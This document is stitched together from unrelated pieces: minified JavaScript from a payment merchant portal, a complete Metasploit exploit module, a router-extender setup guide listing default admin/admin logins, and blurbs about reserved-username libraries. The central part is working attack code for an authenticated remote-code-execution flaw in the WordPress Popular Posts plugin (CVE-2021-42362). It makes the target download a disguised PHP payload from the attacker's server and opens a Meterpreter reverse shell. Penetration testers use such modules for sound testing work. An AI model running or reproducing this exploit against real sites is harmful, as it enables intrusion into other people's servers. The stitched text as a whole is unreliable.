break;case"xml":o.onSuccess(o.xhr.responseXML);break;}} else{if(status===0&&o.timeout>0){o.onError(status,null,'timeout');} else{o.onError(status,null,statusText);}} o.onComplete(status,statusText,responses);} delete o.xhr;}};if(!o.async){callback();} else if(o.xhr.readyState===4){setTimeout(callback,0);} else{xhrCallbackHandle=++xhrCounter;if(fXHRAbortOnUnload){if(!oXHRCallbacks){oXHRCallbacks={};if(window.attachEvent){window.attachEvent("onunload",fXHRAbortOnUnload);} else{window["onunload"]=fXHRAbortOnUnload;}} oXHRCallbacks[xhrCallbackHandle]=callback;} o.xhr.onreadystatechange=callback;}};})(window,undefined);function $empty(){return function(){return true;}};function $getCookie(name){var reg=new RegExp("(^| )"+name+"(?:=([^;]*))?(;|$)"),val=document.cookie.match(reg);return val?(val[2]?unescape(val[2]):""):null;};function $getToken(skey){var skey=skey?skey:$getCookie("skey");return skey?$time33(skey):"";};function $makeUrl(data){var arr=[];for(var k in data){arr.push(k+"="+data[k]);};return arr.join("&");};function $namespace(name){for(var arr=name.split(','),r=0,len=arr.length;r<len;r++){for(var i=0,k,name=arr[r].split('.'),parent={};k=name[i];i++){i===0?eval('(typeof '+k+')==="undefined"?('+k+'={}):"";parent='+k):(parent=parent[k]=parent[k]||{});}}};function $time33(str){for(var i=0,len=str.length,hash=5381;i<len;++i){hash+=(hash<<5)+str.charAt(i).charCodeAt();};return hash&0x7fffffff;};function $xhrMaker(){var xhr;try{xhr=new XMLHttpRequest();}catch(e){try{xhr=new ActiveXObject("Msxml2.XMLHTTP");}catch(e){try{xhr=new ActiveXObject("Microsoft.XMLHTTP");}catch(e){xhr=null;}}};return xhr;};$namespace("MCH.footer");MCH.footer={searchChildMerchantTimer:'',searchChildMerchantName:'',protocolDG:'',protocolCbx:'',protocolBtn:''};MCH.footer.init=function(){footerThat=this;footerThat.bind();footerThat.changeVerify();MCH.footer.protocolDG=Common.getPop('MchProtocolDG');MCH.footer.protocolBtn=$('#MchProtocolBn');MCH.footer.protocolCbx=Common.getCbx({id:'MchProtocolCbx',onCheck:function(){MCH.footer.protocolBtn.removeClass('btn-default').addClass('btn-primary');},onUnCheck:function(){MCH.footer.protocolBtn.removeClass('btn-primary').addClass('btn-default');}});MCH.footer.checkSignProtocol();};MCH.footer.bind=function(){footerThat.bindChangeCheckimg();footerThat.bindDatepicker();MCH.header.bindCloseDialog();footerThat.bindSelect();$('#MchProtocolBn').on('click',function(){if(MCH.footer.protocolCbx.isCheck()){var postData=Common.getCrsfToken();var ret=false;$ajax({url:'/index.php/core/merchant/sign_mch_protocol',data:postData,method:'post',type:'json',async:false,onSuccess:function(data){MCH.header.handleAjax(data);if(data.errorcode!=0){ret=false;}else{ret=true;}},onError:function(msg){ret=false;}});if(!ret){MCH.header.showErrorAlertDialog('操作失败,请稍后重试');}else{MCH.footer.protocolDG.close();}}});};MCH.footer.changeVerify=function(){if($(".img-verify").size()>0){$(".img-verify").attr("src","http://captcha.qq.com/getimage?aid=755049101&rd="+Math.random());}};MCH.footer.bindChangeCheckimg=function(){$(".change-verify").on('click',function(){footerThat.changeVerify();});$(".checkimg-input").on('keydown',function(){var value=$(this).val();result=false;if(value.length==4){var token_name=$("#token").attr("name");var hash=$("#token").val();var post_data=token_name+'='+hash+'&verify_word='+value;$ajax({url:'/index.php/core/home/vaild_checkimg',data:post_data,method:'post',type:'json',async:false,onSuccess:function(data){if(data.errorcode==0){result=true;}else{}},onError:function(msg){result=false;}});}});};MCH.footer.bindDatepicker=function(timepicker){if($(".datepicker-input").size()<=0){return false;} false?$jqueryUi():'';timepicker=timepicker?true:false;var format='Y-m-d';if(timepicker){format='Y-m-d H:i';} $('.datepicker-input').datetimepicker({defaultTime:'00:00:00',step:1,format:format,lang:'ch',timepicker:timepicker,yearStart:1970,closeOnDateSelect:true});$("input.datepicker-input").next("i.ico-date").on('click',function(){$(this).prev('input.datepicker-input').focus();});};MCH.footer.bindSelect=function(){$("div.dropdown-menu").on('click',function(){$(this).addClass('open');});$("ul.dropdown-list").on('click','li',function(){var value=$(this).children("a").attr('data-target');var text=$(this).children("a").text();var drop_switch=$(this).parent().prev("a.dropdown-switch");drop_switch.attr('data-target',value);drop_switch.children('label').text(text);var id=drop_switch.children('label').attr('id');var name=drop_switch.children('label').html();$(this).parent().parent().removeClass('open');typeof SelectCallBack=='function'&&SelectCallBack(id,name);return false;});$("div.dropdown-menu").mouseleave(function(){if($(this).hasClass('open')){$(this).removeClass('open');}});};MCH.footer.searchChildMerchant=function(params){var obj=params['obj'];var value=obj.val();if(value!=MCH.footer.searchChildMerchantName){return false;} var merchants={};var curpage=params['curpage'];var total_page=1;var isAppend=params['isAppend'];var list=obj.parent().parent().children('ul.dropdown-list');if(!isAppend){list.children().remove();} var token_name=$("#token").attr("name");var hash=$("#token").val();var post_data=token_name+'='+hash+'&merchant_name='+value+'&page_num='+curpage;$ajax({url:'/index.php/extend/child_merchant/query_merchant_by_name',data:post_data,method:'post',type:'json',async:true,onSuccess:function(data){if(data.errorcode==0){merchants=data.data.list;curpage=data.data.curpage;total_page=data.data.total_page;for(var key in merchants){var model='<li><a href="#" data-target="'+key+'">'+merchants[key]+'</a></li>';list.append(model);} if(curpage<total_page){var nextPage=parseInt(curpage,10)+1;var model='<dl class="jsDropDownLiMerchantMore"><a href="#" data-target="'+nextPage+'">获取更多子商户</a></dl>';list.append(model);}}},onError:function(msg){}});};MCH.footer.checkSignProtocol=function(){var whiteUrl=['/index.php/core/home','/index.php/core/apply_progress','/index.php/core/apply_bank','/index.php/core/apply_sign','/index.php/core/merchantupgrading','/index.php/core/submerchant/create_sub_merchant','/index.php/public/cms'];var localtion=window.location.pathname;prefix='/index.php';if(localtion.substr(0,prefix.length)!=prefix){localtion=prefix+localtion;} for(var i=0;i<whiteUrl.length;i++){if(localtion.substr(0,whiteUrl[i].length)==whiteUrl[i]){return;}} var postData=Common.getCrsfToken();$ajax({url:'/index.php/public/merchant/check_sign_protocol',data:postData,method:'post',type:'json',async:true,onSuccess:function(data){MCH.header.handleAjax(data);if(data.errorcode!=0){MCH.footer.protocolDG.open();}},onError:function(msg){}});};MCH.footer.init(); window['MCH.footer']='22125:20140422:20161206161027'; window['MCH.footer.time'] && window['MCH.footer.time'].push(new Date()); </script><!--[if !IE]>|xGv00|f223e6d2e6d5217ac8b233a5d7602c18<![endif]--> <script>TA_STATS_ARGS={}</script> <script type="text/javascript" src="https://tajs.qq.com/res/js/wechatpay.min.js" charset="UTF−8"></script> <!-- <script type="text/javascript" src="https://res.wx.qq.com/payactres/zh_CN/htmledition/js/lib/analysis/2.0/lib-min.js" charset="UTF−8" async="async" defer="defer"></script> --> <!--[if !IE]>|xGv00|f5ede3a717a9f61ace3f2ab9101502d0<![endif]--> <!-- 底部 ]] --> <script language="javascript" src="https://pingjs.qq.com/tcss.ping.https.js"></script> <script language="javascript"> if(typeof(pgvMain) == 'function') pgvMain(); </script> <!--[if !IE]>|xGv00|d554775be84487e94ed910def6bb127d<![endif]--></body></html>

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super( update_info( info, 'Name' => 'Wordpress Popular Posts Authenticated RCE', 'Description' => %q{ This exploit requires Metasploit to have a FQDN and the ability to run a payload web server on port 80, 443, or 8080. The FQDN must also not resolve to a reserved address (192/172/127/10). The server must also respond to a HEAD request for the payload, prior to getting a GET request. This exploit leverages an authenticated improper input validation in Wordpress plugin Popular Posts <= 5.3.2. The exploit chain is rather complicated. Authentication is required and 'gd' for PHP is required on the server. Then the Popular Post plugin is reconfigured to allow for an arbitrary URL for the post image in the widget. A post is made, then requests are sent to the post to make it more popular than the previous #1 by 5. Once the post hits the top 5, and after a 60sec (we wait 90) server cache refresh, the homepage widget is loaded which triggers the plugin to download the payload from our server. Our payload has a 'GIF' header, and a double extension ('.gif.php') allowing for arbitrary PHP code to be executed. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Simone Cristofaro', # edb 'Jerome Bruandet' # original analysis ], 'References' => [ [ 'EDB', '50129' ], [ 'URL', 'https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/' ], [ 'WPVDB', 'bd4f157c-a3d7-4535-a587-0102ba4e3009' ], [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2542638' ], [ 'URL', 'https://github.com/cabrerahector/wordpress-popular-posts/commit/d9b274cf6812eb446e4103cb18f69897ec6fe601' ], [ 'CVE', '2021-42362' ] ], 'Platform' => ['php'], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic Target', {}] ], 'DisclosureDate' => '2021-06-11', 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp', 'WfsDelay' => 3000 # 50 minutes, other visitors to the site may trigger }, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('USERNAME', [true, 'Username of the account', 'admin']), OptString.new('PASSWORD', [true, 'Password of the account', 'admin']), OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L560 OptString.new('SRVHOSTNAME', [true, 'FQDN of the metasploit server. Must not resolve to a reserved address (192/10/127/172)', '']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L584 OptEnum.new('SRVPORT', [true, 'The local port to listen on.', 'login', ['80', '443', '8080']]), ] end def check return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online? checkcode = check_plugin_version_from_readme('wordpress-popular-posts', '5.3.3') if checkcode == CheckCode::Safe print_error('Popular Posts not a vulnerable version') end return checkcode end def trigger_payload(on_disk_payload_name) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) # loop this 5 times just incase there is a time delay in writing the file by the server (1..5).each do |i| print_status("Triggering shell at: #{normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name)} in 10 seconds. Attempt #{i} of 5") Rex.sleep(10) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name), 'keep_cookies' => 'true' ) end if res && res.code == 404 print_error('Failed to find payload, may not have uploaded correctly.') end end def on_request_uri(cli, request, payload_name, post_id) if request.method == 'HEAD' print_good('Responding to initial HEAD request (passed check 1)') # according to https://stackoverflow.com/questions/3854842/content-length-header-with-head-requests we should have a valid Content-Length # however that seems to be calculated dynamically, as it is overwritten to 0 on this response. leaving here as notes. # also didn't want to send the true payload in the body to make the size correct as that gives a higher chance of us getting caught return send_response(cli, '', { 'Content-Type' => 'image/gif', 'Content-Length' => "GIF#{payload.encoded}".length.to_s }) end if request.method == 'GET' on_disk_payload_name = "#{post_id}_#{payload_name}" register_file_for_cleanup(on_disk_payload_name) print_good('Responding to GET request (passed check 2)') send_response(cli, "GIF#{payload.encoded}", 'Content-Type' => 'image/gif') close_client(cli) # for some odd reason we need to close the connection manually for PHP/WP to finish its functions Rex.sleep(2) # wait for WP to finish all the checks it needs trigger_payload(on_disk_payload_name) end print_status("Received unexpected #{request.method} request") end def check_gd_installed(cookie) vprint_status('Checking if gd is installed') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res.body.include? ' gd' end def get_wpp_admin_token(cookie) vprint_status('Retrieving wpp_admin token') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'tools' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /<input type="hidden" id="wpp-admin-token" name="wpp-admin-token" value="([^"]*)/ =~ res.body Regexp.last_match(1) end def change_settings(cookie, token) vprint_status('Updating popular posts settings for images') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'upload_thumb_src' => '', 'thumb_source' => 'custom_field', 'thumb_lazy_load' => 0, 'thumb_field' => 'wpp_thumbnail', 'thumb_field_resize' => 1, 'section' => 'thumb', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Unable to save/change settings') unless /<strong>Settings saved/ =~ res.body end def clear_cache(cookie, token) vprint_status('Clearing image cache') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'action' => 'wpp_clear_thumbnail', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 end def enable_custom_fields(cookie, custom_nonce, post) # this should enable the ajax_nonce, it will 302 us back to the referer page as well so we can get it. res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post.php'), 'cookie' => cookie, 'keep_cookies' => 'true', 'method' => 'POST', 'vars_post' => { 'toggle-custom-fields-nonce' => custom_nonce, '_wp_http_referer' => "#{normalize_uri(target_uri.path, 'wp-admin', 'post.php')}?post=#{post}&action=edit", 'action' => 'toggle-custom-fields' } ) /name="_ajax_nonce-add-meta" value="([^"]*)/ =~ res.body Regexp.last_match(1) end def create_post(cookie) vprint_status('Creating new post') # get post ID and nonces res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post-new.php'), 'cookie' => cookie, 'keep_cookies' => 'true' ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /name="_ajax_nonce-add-meta" value="(?<ajax_nonce>[^"]*)/ =~ res.body /wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware\( "(?<wp_nonce>[^"]*)/ =~ res.body /},"post":{"id":(?<post_id>\d*)/ =~ res.body if ajax_nonce.nil? print_error('missing ajax nonce field, attempting to re-enable. if this fails, you may need to change the interface to enable this. See https://www.hostpapa.com/knowledgebase/add-custom-meta-boxes-wordpress-posts/. Or check (while writing a post) Options > Preferences > Panels > Additional > Custom Fields.') /name="toggle-custom-fields-nonce" value="(?<custom_nonce>[^"]*)/ =~ res.body ajax_nonce = enable_custom_fields(cookie, custom_nonce, post_id) end unless ajax_nonce.nil? vprint_status("ajax nonce: #{ajax_nonce}") end unless wp_nonce.nil? vprint_status("wp nonce: #{wp_nonce}") end unless post_id.nil? vprint_status("Created Post: #{post_id}") end fail_with(Failure::UnexpectedReply, 'Unable to retrieve nonces and/or new post id') unless ajax_nonce && wp_nonce && post_id # publish new post vprint_status("Writing content to Post: #{post_id}") # this is very different from the EDB POC, I kept getting 200 to the home page with their example, so this is based off what the UI submits res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'ctype' => 'application/json', 'accept' => 'application/json', 'vars_get' => { '_locale' => 'user', 'rest_route' => normalize_uri(target_uri.path, 'wp', 'v2', 'posts', post_id) }, 'data' => { 'id' => post_id, 'title' => Rex::Text.rand_text_alphanumeric(20..30), 'content' => "<!-- wp:paragraph -->\n<p>#{Rex::Text.rand_text_alphanumeric(100..200)}</p>\n<!-- /wp:paragraph -->", 'status' => 'publish' }.to_json, 'headers' => { 'X-WP-Nonce' => wp_nonce, 'X-HTTP-Method-Override' => 'PUT' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Post failed to publish') unless res.body.include? '"status":"publish"' return post_id, ajax_nonce, wp_nonce end def add_meta(cookie, post_id, ajax_nonce, payload_name) payload_url = "http://#{datastore['SRVHOSTNAME']}:#{datastore['SRVPORT']}/#{payload_name}" vprint_status("Adding malicious metadata for redirect to #{payload_url}") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_post' => { '_ajax_nonce' => 0, 'action' => 'add-meta', 'metakeyselect' => 'wpp_thumbnail', 'metakeyinput' => '', 'metavalue' => payload_url, '_ajax_nonce-add-meta' => ajax_nonce, 'post_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Failed to update metadata') unless res.body.include? "<tr id='meta-" end def boost_post(cookie, post_id, wp_nonce, post_count) # redirect as needed res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'keep_cookies' => 'true', 'cookie' => cookie, 'vars_get' => { 'page_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 || res.code == 301 print_status("Sending #{post_count} views to #{res.headers['Location']}") location = res.headers['Location'].split('/')[3...-1].join('/') # http://example.com/<take this value>/<and anything after> (1..post_count).each do |_c| res = send_request_cgi!( 'uri' => "/#{location}", 'cookie' => cookie, 'keep_cookies' => 'true' ) # just send away, who cares about the response fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res = send_request_cgi( # this URL varies from the POC on EDB, and is modeled after what the browser does 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_get' => { 'rest_route' => normalize_uri('wordpress-popular-posts', 'v1', 'popular-posts') }, 'keep_cookies' => 'true', 'method' => 'POST', 'cookie' => cookie, 'vars_post' => { '_wpnonce' => wp_nonce, 'wpp_id' => post_id, 'sampling' => 0, 'sampling_rate' => 100 } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 201 end fail_with(Failure::Unreachable, 'Site not responding') unless res end def get_top_posts print_status('Determining post with most views') res = get_widget />(?<views>\d+) views</ =~ res.body views = views.to_i print_status("Top Views: #{views}") views += 5 # make us the top post unless datastore['VISTS'].nil? print_status("Overriding post count due to VISITS being set, from #{views} to #{datastore['VISITS']}") views = datastore['VISITS'] end views end def get_widget # load home page to grab the widget ID. At times we seem to hit the widget when it's refreshing and it doesn't respond # which then would kill the exploit, so in this case we just keep trying. (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 /data-widget-id="wpp-(?<widget_id>\d+)/ =~ @res.body # load the widget directly (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php', 'wp-json', 'wordpress-popular-posts', 'v1', 'popular-posts', 'widget', widget_id), 'keep_cookies' => 'true', 'vars_get' => { 'is_single' => 0 } ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 @res end def exploit fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if datastore['SRVHOST'] == '0.0.0.0' cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD']) if cookie.nil? vprint_error('Invalid login, check credentials') return end payload_name = "#{Rex::Text.rand_text_alphanumeric(5..8)}.gif.php" vprint_status("Payload file name: #{payload_name}") fail_with(Failure::NotVulnerable, 'gd is not installed on server, uexploitable') unless check_gd_installed(cookie) post_count = get_top_posts # we dont need to pass the cookie anymore since its now saved into http client token = get_wpp_admin_token(cookie) vprint_status("wpp_admin_token: #{token}") change_settings(cookie, token) clear_cache(cookie, token) post_id, ajax_nonce, wp_nonce = create_post(cookie) print_status('Starting web server to handle request for image payload') start_service({ 'Uri' => { 'Proc' => proc { |cli, req| on_request_uri(cli, req, payload_name, post_id) }, 'Path' => "/#{payload_name}" } }) add_meta(cookie, post_id, ajax_nonce, payload_name) boost_post(cookie, post_id, wp_nonce, post_count) print_status('Waiting 90sec for cache refresh by server') Rex.sleep(90) print_status('Attempting to force loading of shell by visiting to homepage and loading the widget') res = get_widget print_good('We made it to the top!') if res.body.include? payload_name # if res.body.include? datastore['SRVHOSTNAME'] # fail_with(Failure::UnexpectedReply, "Found #{datastore['SRVHOSTNAME']} in page content. Payload likely wasn't copied to the server.") # end # at this point, we rely on our web server getting requests to make the rest happen end end

A list of reserved usernames to prevent url collision with resource paths. Packaged as a Composer library. Source data: https://github.com/shouldbee/reserved-usernames

Skip to content Setup.ampedwireless.com Amped Wireless Setup | amped Wireless amped wireless setup setup ampedwireless com Why is setup.ampedwireless.com not working? There may be several aspects because of which a user is unable to access the setup.ampedwireless.com interface of the router. A user loses his control and management from the router if he fails to access the web interface of the Amped router. For quick help, you can also check the manual guide that comes with the router or can also search for the Online manual guide over the Internet. Follow the below steps to troubleshoot the issue If there is a wired connection between the router and your computer, make sure the physical connection is correct. Make sure the switch is turned on with which you have connected the Power cable of the wireless router. If you are typing the LAN IP address of the router in the address bar, make sure you are typing correctly. The default LAN IP address of the Amped router is 192.168.0.254. Ensure that the computer is not connected to any other wireless network at the same time. If there is a wireless connection between the devices, make sure the computer is within the wireless range of the router. Close the current browser and launch it again. Delete the history and cache memory of a browser using the settings tab. Try again to access the setup.ampedwireless.com interface. Use Google Chrome, internet explorer, and Mozilla. Any other browser may be the reason you get denied from accessing the setup.ampedwireless.com window. If the Setup Wizard directly appears, instead of the web menu Dashboard, it may be the reason that the router has not been configured yet. Reset the router by holding the reset button for around 10 to 20 seconds. It will revert the default settings into the router. When the reset process is done, complete the setup wizard or skip it to access the Dashboard. Note: If all the above troubleshooting steps fail to resolve the setup.ampedwireless.com issue, you can call the Support team of the Amped to resolve the issue. We are available for our users 24 hours a clock to resolve any kind of issue a user is facing. How to login into the Amped Wireless range extender? Amped Wireless range extender can interact through the web interface of the setup.ampedwireless.com interface. To interact with the web menu Dashboard, you need to go through the login window of the Amped range extender. You cannot perform the login process if you don’t know the correct login credentials of the Amped extender login window. The default username of the Amped extender is “admin” and the default password is “admin”. amped router login Steps to log into the Amped wireless range extender Open a browser on the computer connected to the extender’s network. Type ampedsetupwireless.com in the address bar and hit enter If you fail to enter, type the LAN IP address of the range extender in the address bar. The LAN IP address of the Amped range extender is 192.168.0.254. The default Amped range extender login window appears on the screen. Type “admin” in the username field as the default credentials and type the password you typed earlier during the login process. If you haven’t changed the default password type “admin” in the provided field. Both the username and password are case-sensitive. Note: You need to hold the shift key before typing an uppercase letter and release the key before typing a lowercase letter. Click Login and the web menu Dashboard of the Amped range extender appears. Now you can change the settings and features of the Amped range extender. Note: While performing the login process, make sure you are typing the correct login credentials, otherwise you will be denied from accessing the web interface of the Amped range extender. How to setup an Amped wireless range extender via setup.ampedwireless.com? Optimum placement of a range extender is vital to fetch robust Wi-fi speed from the main network. The location plays an important role in determining the performance level of the range extender. You can also take the help of a Quick setup guide that comes with the range extender to perform correct steps during the setup process. Note: Connect your computer to the extender via Ethernet cable to avoid sudden disconnection during the setup process. Follow the below steps to set up the Amped rec 10 range extender Unbox the range extender and take out the quick setup guide, warranty card, and a power cable. Adjust the antennas of the Amped wireless range extender. Connect the range extender to an available electric outlet near the main router. Note down the default Wireless settings from the back of your range extender Use the default Wireless settings to connect wirelessly to the computer, Go to the computer, open the Wi-fi settings and search for the available Wi-fi networks. Connect to the default network name of the range extender. Once you get connected to the range extender’s network, launch a browser. Type setup.ampedwireless.com on the address bar of the browser and hit enter. You can also type 192.168.0.254 as the URL of the browser. The setup.ampedwireless.com configuration page appears on the screen. Select the “Wireless range extender” option and click Next to proceed. Click Scan to find Wi-fi networks nearby to extend. The Wi-fi devices available near the Wi-fi appear on the screen. Select the Wi-fi network you want to extend. Type the Wi-fi password in the provided field to connect to it. Click Next. Follow the above step twice, if you are connecting the range extender to a dual-band router. Now, follow the onscreen instructions to proceed with further steps. Personalize the Wi-fi settings of the extended network. Users are recommended to change the default wireless settings. Assign a new network name and Wi-fi password to the extended network. A new network name must be unique to allow users to connect to the extender’s network. If you want to create a hidden network select the “Hide SSID” option. To connect to a hidden network, a user has enter the network name in the Wi-fi list manually Once done, click Next. Now you can review the configuration settings you made Note down the wireless and other administrative settings you made for future use. Click Finish when it’s done. The extender starts the reboot process to apply the settings you made. Wait for a couple of minutes until the reboot process is complete. Note: Once the setup process is done, you can relocate the range extender to the desired location. Place the range extender midway between the router and your computer for better results. You can take the help of the Wi-fi LED of the range extender to find a good spot to place the range extender. If the LED blinks blue the range extender is at a good spot and if the LED blinks red, it means you need to bring the range extender close to the router. How to update the firmware of the Amped wireless range extender? The firmware plays an important role in removing the bugs of the range extender and escalating the performance of your device. New firmware is stored in the flash memory of the device. New firmware is responsible for removing bugs and adding new features to the range extender. It improves the mechanism of administrative settings and refines the networking protocols. Steps to update the firmware of the Amped wireless range extender Visit the downloading center of the Amped extender i.e www.ampedwireless.com /support. Type in the model version and product name in the provided fields. Click Download when prompted. Remember the location where you saved the downloaded firmware file. Do not forget to extract the firmware file. It will give you convenience while uploading the file into the ampedsetupwireless.com interface. Open a browser on the computer connected to the extender’s network. Type ampedsetupwireless.com in the address bar and hit enter If you fail to enter, type 192.168.0.254.in in the address bar. The default Amped range extender login window appears on the screen. Type “admin” in the username field as the default credentials and type the password you typed earlier during the login process. If you haven’t changed the default password type “admin” as the default credentials Both the username and password are case-sensitive. Note: You need to hold the shift key before typing an uppercase letter and release the key before typing a lowercase letter. Click Login and the web menu Dashboard of the Amped range extender appears. From the main navigation panel, click on the Management tab then click on the Firmware Upgrade tab. Scroll down the firmware upgrade page. Click “Choose file” and navigate the cursor to locate the file. Select the file then click Upload when prompted to begin the upgrade process. Wait for a few minutes to let the process complete. Do not interrupt the installation process, it may lead to failure in the update process. When the process gets completed, the Amped range extender automatically reboots. Note: You can check the confirmation of the update process through the status tab of the ampedsetupwireless.com window. Make sure you have already read the release notes of the firmware to know the settings that will get erased during the update process. How to Connect to the Amped Range extender? The connection process is one of the important processes through which a user connects the amped range extender to the router. You can connect the Amped range extender to the router via a wired connection and the wireless connection. The wired connection is done through the Ethernet cable and the wireless connection is done via the WPS connection method. Here are the things you need to keep in mind before the connection process. Place the range extender about halfway midway through the router and the Wi-fi dead zone. Fix the range extender in a ventilating or a mounting area to receive the clear Wi-fi signals. Keep the extender away from electronic or radioactive appliances. Make sure there are no walls or metallic objects between the router and the range extender. Steps to connect to the Amped range extender Plugin the range extender directly to a power outlet near the main router Wait until the Power LED turns solid green. Now press the WPS button on your router. Go to the range extender, press, and hold the WPS button for around 3 seconds. Wait for a couple of seconds to establish the connection between the router and the range extender When the LED changes from the blinking to the stable, it means the connection got established. If you have a dual-band router, repeat the above step to connect to the 5GHz frequency band. When the connection gets established, relocate the extender to a suitable location. Check the signal LED, if the signals are strong the LED blinks white. If the signals are weak, the LED blinks red which means you need to bring the router closer to the range extender. Now go to the computer and search for the available Wi-fi networks. Use the default Wireless settings given on the back of the range extender to connect to the computer. The default Wireless name will end with the _EXT. For example Amped_EXT. Type default network key in the provided field and click Connect. When it gets connected to the extended network, launch a browser. Type setup.ampedwireless.com in the address browser and hit enter. You can also type 192.168.0.254 as the URL of the browser. The setup.ampedwireless.com configuration page appears on the screen. Now you can proceed to begin the setup process. Note: New users recommended connecting the range extender to the router through a wired connection. You can use the Ethernet cable of the router to create a wired connection between the devices. If you face any obstruction during the setup process, you can call our executives anytime to resolve the issue you are facing. Archives November 2021 Categories Uncategorized Copyright © All right reserved Created By: Fansee Themes Amped Wireless Setup

Reserved usernames

A bundle to clean, and check, a given username against an (extensible) list of reserved words/usernames

A comprehensive list of 1,200+ reserved slugs and usernames to prevent URL collisions in web applications

Multi-threaded Python tool to check Telegram username availability via Fragment.com API and Telegram web. Supports loading usernames from GitHub raw URLs, local files, or generating random names. Sends Telegram bot alerts for free or reserved usernames. Filters reserved words and handles retries for reliability.

A Symfony bundle to restrict reserved values in form fields such as usernames or slugs, with support for exact matches and regular expressions.

